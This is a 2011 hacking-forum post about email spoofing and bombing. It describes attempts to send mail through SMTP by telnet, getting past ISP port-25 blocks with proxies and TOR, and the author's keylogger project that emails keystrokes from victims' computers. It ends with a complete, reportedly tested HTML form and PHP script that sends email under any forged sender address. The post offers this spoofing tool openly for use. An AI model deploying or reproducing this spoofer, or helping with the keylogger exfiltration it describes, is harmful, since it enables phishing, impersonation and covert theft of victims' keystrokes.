Page 1 of 1

Email hacks - spoofer / spoofing / bomber / bombing

PostPosted: Sun Aug 07, 2011 3:49 pm
by Sethioz
////////////////////////////////////////////////////////////////////
Knowledge Database article of Email spoofing and hacking has been added, all important updates and tutorials will go there
////////////////////////////////////////////////////////////////////



you can send email via telnet, but i cant even connect to any of the servers. any1 has any ideas ?

here's what you do:

open up cmd (command prompt) and type in "telnet"
now when telnet is open, you type this:

Code: Select all
o n.mx.mail.yahoo.com 25


o - means connect to
n.mx.mail.yahoo.com - should be one of the yahoo SMTP servers, which works 100% when using keylogger
25 - is the port (SMTP default is 25, might also be 23)



UPDATE

i have confirmed it myself, it IS conspiracy. ISP is blocking outgoing 25. and another conspiracy is by microSHITsoft, telnet.exe cannot be seen by any 3rd party programs, which means i cant proxify it, however putty has built-in telnet + proxy support, so i tested and it works just fine.
another good set of tools is "net tools" which has many email tools, i update once i get it successfully working.
i dunno WTF it is, because ALL of my tests, with all the tools have failed, i sense it has something to do with my ISP and its annoying me. fucking conspiracy fuckers ...
i have one keylogger project which uses same method to send keylogs to email from victim's computer, i tested that keylogger in my secondary pc running XP and also in the virutal machine running XP and it cant connect.
i used "ardamax keylogger maker" in my main pc with gay7 64-bit and it wont even complete the test, saying cannot connect.
it cant be that about 100 servers ive tested are not working, specially if i know it works from somebody elses pc, someone confirms or decline ?!
simply find a working SMTP server and make a successful connect using telnet, then i will test and see if it really is conspiracy, i think my ISP have blocked outgoing 25 or something.


UPDATE

this seem to be a complete nightmare, something that sounds simple as 1 2 3 turn out to be complicated as rocket science.
here are reasons that prevent this:
1. most ISPs are blocking outgoing port 25 so you can't connect to email servers (bypassable when using proxy)
2. its extremely hard to find email servers that work with proxy
3. local SMTP doesnt seem to be working either.

here's what ive tried:

i downloaded "free smtp server" and ran it locally, even tried port "8080", still didnt work. on some reason it always says that reciepents email is invalid.
tested nettools 5 email spoofers, none of them seem to work with gmail SMTP, while yahoo and hotmail are blocking most of TOR network, so its hard to find a working SMTP.
with nettools i got this far:

Code: Select all
220 mx.google.com ESMTP fo18si13984949wbb.12

Connected to gmail-smtp-in.l.google.com.
MAIL FROM: [email protected]
503 5.5.1 EHLO/HELO first. fo18si13984949wbb.12

..then it just gets stuck there.

im guessing this conspiracy goes deeper than it seems. those errors ive got are most likely sent by the SMTP servers i tried to use or when using free SMTP server (local SMTP), then email sites seem to block mails coming from there, somehow .. ?!

i dont have answer at this point, however i will succeed in this and post full tutorial on how to bypass those conspiracies.


UPDATE

i found a working php/html script that works. all you need is web hosting that allows html/php and has SMTP.
it consist of 2 parts, index and spoofer itself. its easy.

make a file and call it whatever you want, like "spoof_index.html" and put the following code in it and save:

Code: Select all
<form action="spoofer.php" method="GET">

<p>To Email: <input type="text" name="email" /></p>

<p>Subject: <input type="text" name="header" /></p>

<p>From Email: <input type="text" name="fake" /></p>

<p>Email Message: <textarea name="message"></textarea></p>

<p><input type="submit" value="Send Email"></p>

</form>


Now make another file and call it "spoofer.php" (you can change this, but you have to change it in the above code. replace spoofer.php with anything you want and make new file with same name. this code is meant to work with "spoofer.php" as seen above. so now into spoofer.php add the following code:

Code: Select all
<?php

if (!isset($_GET[email]) || empty($_GET[email]))
{
echo "TO field is empty";
exit;
}
else
{
$to = $_GET[email];
}

if (!isset($_GET[header]) || empty($_GET[header]))
{
echo "Subject is missing";
exit;
}
else
{
$subject = $_GET[header];
}

if (!isset($_GET[fake]) || empty($_GET[fake]))
{
echo "FROM email address is missing";
exit;
}
else
{
$fake = $_GET[fake];
}

if (!isset($_GET[message]) || empty($_GET[message]))
{
echo "email message box is empty";
exit;
}
else
{
$message = $_GET[message];
}

$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=iso-8859-1" . "\r\n";
$headers .= "From: " . $fake . " <" . $fake . ">" . "\r\n";

if (mail($to, $subject, $message, $headers))
{
echo"<h1>Success</h1>\n";
echo"<p>The e-mail was successfully sent to <i>" . $to . "</i></p>\n";
echo"<p>From: <i>" . $fake . "</i></p>\n";
echo"<p>Subject: <i>" . $subject . "</i></p>\n";
echo"<p>Message:</p>\n";
echo"<p><b>" . $message . "</b></p>";
}
else
{
echo"<h1>Error!</h1>\n";
echo"<p>The mail() function failed.</p>";
}

?>



I have tested it on my own hosting and it works 100%